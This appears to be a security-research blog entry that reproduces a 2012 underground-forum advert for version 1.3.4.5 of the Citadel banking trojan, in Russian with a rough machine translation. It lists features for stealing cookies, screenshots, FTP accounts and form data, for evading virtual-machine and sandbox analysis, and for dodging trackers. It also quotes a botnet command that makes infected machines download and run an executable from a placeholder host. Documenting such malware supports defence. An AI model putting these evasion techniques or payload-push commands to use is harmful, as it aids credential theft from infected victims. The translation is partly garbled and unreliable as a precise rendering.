2012-06-11 - Evolution

Update to Citadel : v.1.3.4.5

A new version of Citadel has been announced : v1.3.4.5 "Summer Edition"
Aquabox post on Exploit.in
Original text of the advert :
Новая летняя версия Citadel 1.3.4.5 Summer Edition готова порадовать ваших ботов своим присутствием и обильным функционалом.

Как видите, за последний месяц произошло много изменений, например вышел Chrome 19, старые версии начали попадать в ZeusTracker.

Поэтому пока одни сомневаются, другие зарабатывают и идут в ногу со временем, обналичивая очередной залив и улучшая свой софт :)
Изменений очень много, от глобальных до минимальных, все их здесь нет смысла писать, поэтому выделим самое основное, что пригодится в боевых условиях именно вам:

[+] Добавлен онлайн просмотр скриншотов из админки. Скрины выстраиваются в ряд в порядке появления, легко переключаются клавишами вперед-назад, сортируются. Нет смысла больше скачивать картинки и смотреть по одной. Виртуальные клавиатуры/страницы видно последовательно.
[+] Добавлена история отстука, вы можете посмотреть статистику отстука вашего ботнета(активных,всего,процент) за неделю, две недели или месяц.
[+] Добавлена история версий софта, вы можете посмотреть статистику по обновлениям Citadel в вашем ботнете. Будете знать сколько ботов перешло на новую версию, а сколько осталось на старой. Рисуется диаграмма.
[+] Возможность поиска логов, только по ботам, которые находятся в онлайне.
[+] Возможность поиска логов по нескольким кейвордам сразу, а также можн их сохранить как алиас и не вводить при следущем поиске заново, а просто выбрать из списка.
[+] Добавлена кнопка "Cookies" в контекстное меню по ботам, которая позволяет оперативно вывести все Cookies бота, если вы их не отключали. Экономит время.
[+] Интегрирована функция экспорта FTP-аккаунтов в API, полезно, если используете сторонний софт класса FTP-Iframer, позволяет вывести в plain-text/xml/php формате ftp-акки по нужной дате.
[+] Добавлена кнопка "Whois" в просмотре отчета, позволяет одним кликом получить всю информацию по IP-адресу отчета.
[+] Добавлена функция комментария к боту при просмотре отчета, а также времени, когда бот последний раз был онлайн. Комментарий подсвечивается при поиске в логах.
[+] Создан новый раздел "Избранные отчеты", который позволяет сохранить быструю ссылку на нужный вам отчет + комментарий к ниму. К примеру, если вы встретили интересный аккаунт, нажимаете "добавить в избранное" и отчет будет виден в отдельном разделе, с автоматическим Whois'ом данных и вашим комментарием. Сохраняйте акки не отходя от кассы.
[+] Добавлен антиэмулятор, который позволяет защитить ваш ботнет от реверсинга и попадания в трекеры. Если при запуске, билд детектит что он был запущен в виртуальной машине или песочнице CWSandbox, VMware, Virtualbox, Sandbox он начинает вести себя по-другому и ваш ботнет останется незамеченным. Подробности не раскрываются, т.к анонс находится в паблике и технология очень хитрая.
Из минусов: не сможете протестировать работу в Vmware, придется делать это на реальном ПК или дедике. Опция antiemulation_enable 1/0 вынесена в конфиг.
[+] Добавлено отображение статуса бота "Online/Offline" при просмотре отчета.
[+] Одна из самых главных фич: предпросмотр отчета при поиске логов. Не нужно больше открывать 200 окон в браузере, чтобы просмотреть каждый отчет и каждую ссылку. Теперь можно легко нажав на один отчет сделать предпросмотр, а если отчет будет интересен, то просмотреть полную версию. 
Поддерживается быстрое переключение между отчетами клавишами назад-вперед-ESC.
[+] Обновлён скрипт cronjob очистки старых скриптов(команд). Теперь должен у всех работать без багов.
[+] Добавлена в контекстное меню опция "Скриншоты бота"
[+] Модуль VNC-админки: добавлена сортировка по дате последнего соединения / ОС (К примеру, если нужно только WinXP).
[+] Модуль парсер логов: добавлена сортировка по домену / количеству отчётов в порядке убывания.
[+] Модуль FTP-ифреймер: исправлен баг с "умным" ифреймингом, когда кавычки в iframe-коде экранировались. Текущим владельцам, рекомендуется перезалить скрипт-прокладку.
[+] Поскольку предыдущий алгоритм шифрования был взломан спустя несколько месяцев, из-за этого некоторые клиенты попадали в ZeusTracker. Мы разработали и внедрили новый алгоритм шифрования на основе модифицированного RC4. В шифровании используется особый ключ, известный только клиенту. что требует его наличия для расшифровки. Поскольку у каждого клиента свой индвидуальный ключ, теперь от одного клиента не будут страдать все остальные. Если попал один, другие будут от этого защищены. Сейчас мы полностью изолированы от автоматического анализа билдов. В итоге получаем 2 уровня авторизации-защиты бота от трекеров.
[+] Сделали подрезание опции X-Frame-Options в HTTP Header'ах, т.к она может мешать некоторым инжектам в работе (отвечает за фреймы на странице).
[+] Проделана огромная работа для корректного формграббинга/инжектинга в Chrome 19 (19.0.1084.52m).
[+] Ускорена работа на больших ботнетах админ.интерфейса + гейта засчет оптимизации функционала GeoIP-базы.
[+] Сделано возможное удаление .sol файлов при установке билда.
[+] Добавлен граббинг Accept-Language, Accept-Encoding в отчетах.


Новая версия в связи с измененным алгоритмом шифрования несовместима со старыми, поэтому ставим админку в новую директорию(+новую БД) и переносим ботов через команду user_executehttp://www.host.com/1345.exe. После переноса ботов, даем на старой админке команду bot_uninstall, чтобы деактивировать старую версию.
Опубликована новая версия мануала, рекомендуется перечитать его снова для усвоения новой информации по софту.
Размещаем заявки у support'a, выдача будет производиться если полностью уплачена арендная плата. Займет от 3 до 48 часов с момента размещения.
Выдача начинается в понедельник а 23.00.
Совсем скоро будет закрытие открытой продажи для всех и ввод системы покупки только через поручителей (текущих клиентов), поэтому те, кто писал по поводу демо-версии, поторопитесь с решением или придется искать поручителей.
Цены остались прежними, скидки только при покупке VIP-пакета. 

Google Translation :

The new version of the old Citadel 1.3.4.5 Summer Edition is ready to please your bot with his presence and rich functionality.

As you can see, over the past month there have been many changes such as Chrome came out 19, older versions are being released in ZeusTracker.
Therefore, while some doubt, others earn and keep pace with the times, cashing out the next bay and improving their software :)
Change very much from the global to the minimum, all of them there is no point in writing, so we select the most fundamental thing that is useful in combat for you:

[+] Added online preview screenshots from the admin. Screens are arranged in series in order of appearance, it is easy to switch back and forth keys are sorted. There is no point to download more pictures and watch one. Virtual Keyboard / pages can be seen consistently.
[+] Added otstuk history, you can view your stats otstuk botnet (the active, total, percentage) for a week, fortnight or month.
[+] Added the version history of software, you can see statistics on the Citadel updates in your botnet. Will you know how many bots taken over to the new version, and how much is left on the old. Draw a diagram.
[+] Ability to search log, only bots that are online.
[+] Ability to search across multiple logs of keywords at once, and they can be saved as an alias and not when you next enter the search again, simply choose from the list.[+] Added button "Cookies" in the context menu on the bot, which allows for the rapid withdrawal of all Cookies bot, if you do not cut off. Saves time.
[+] Integrated functionality to export FTP-accounts in the API, useful if you are using a third-party software-class FTP-Iframer, allows us to derive a plain-text/xml/php format ftp-acca on the date.
[+] Added button "Whois" to view the report, one click lets get all the information on the IP-address of the report.
[+] Added a comment to the bot when viewing the report, as well as the time when the boat was last online. Comment is highlighted when looking at the logs.
[+] Created a new section "Selected Records", which allows you to save a quick link to the desired report + nimu comment. For example, if you come across an interesting account, click "Add to Favorites" and a report will be displayed in a separate section, with automatic data Whois'om your comment. Keep acca on the spot.
[+] Added antiemulyator, which allows you to protect your botnet on the reversing and getting into trackers. When you start, build a detective that he was running in a virtual machine or a sandbox CWSandbox, VMware, Virtualbox, Sandbox, he starts to behave differently and your botnet go unnoticed. Details were not disclosed, tk's announcement is in the Public and the technology is very tricky.
Of the minuses: can not test the work in Vmware, have to do it on a real PC or Dedik.Option antiemulation_enable 1/0 is moved to the config.
[+] Added Bot status "Online / Offline" when viewing the report.
[+] One of the most important features: Preview report in the search logs. No need to open more than 200 windows in your browser to view each report, and each link. Now you can easily click on a preview to make a report, and if the report will be of interest, then view the full version.
Supported by the rapid switching between reports keys back and forth-ESC.[+] Updated cronjob script cleanup of old scripts (commands). Now everyone has to work without bugs.
[+] Added context menu option "Screenshots bot"
[+] Module VNC-admin: added sorting by date of last connection / OS (for example, if you only need to WinXP).
[+] Module log parser: added sorting by domain / number of reports in descending order.
[+] FTP-module ifreymer: Fixed bug with "smart" ifreymingom when the quotes in the code iframe-screened. The current owners are encouraged perezalit script pad.
[+] Since the previous encryption algorithm has been hacked a few months later, because of this, some customers got into ZeusTracker. We have developed and implemented a new encryption algorithm based on modified RC4. In cryptography uses a special key known only to the client. that requires its presence for decryption. Because each client's own indvidualny key, now from one client will not suffer all the rest. If you got one, others will be protected from this. Now we are completely isolated from the automatic analysis builds. As a result, we obtain the two-level authorization, protection from the boat trackers.
[+] Did cropping options X-Frame-Options in HTTP Header'ah, unnecessarily, it may interfere with some inzhekta work (responsible for the frames on the page).
[+] Be done to correct formgrabbinga / inzhektinga in Chrome 19 (19.0.1084.52m).
[+] Works faster on large botnets admin.interfeysa + gate expense of functional optimization GeoIP-database.
[+] Made possible removal. Sol files when you install this build.
[+] Added grabbing Accept-Language, Accept-Encoding in the reports.

The new version due to changes in the encryption algorithm is incompatible with the old, so we put in a new directory admin (+ new DB) and carry a team of bots user_execute http://www.host.com/1345.exe. Following the transfer of bots, we give the old admin team bot_uninstall, to deactivate the old version.
Published a new version of the manual, it is recommended to re-read it again for the assimilation of new information on the software.
Place the application in support'a, will be giving if fully paid the rent. It will take from 3 to 48 hours after placement.
Issue begins on Monday and 23.00.
Very soon will be closed to all public sales and commissioning of the system only through the purchase of the guarantors (current customers), so that those who wrote about the demo, hurry up with the solution or have to find sureties.
Prices remain the same, only the discount when purchasing VIP-package.
-----------------------------------------------------------------------------------------------------------
You may be interested by : Inside Citadel v1.3.4.5 C&C & Builder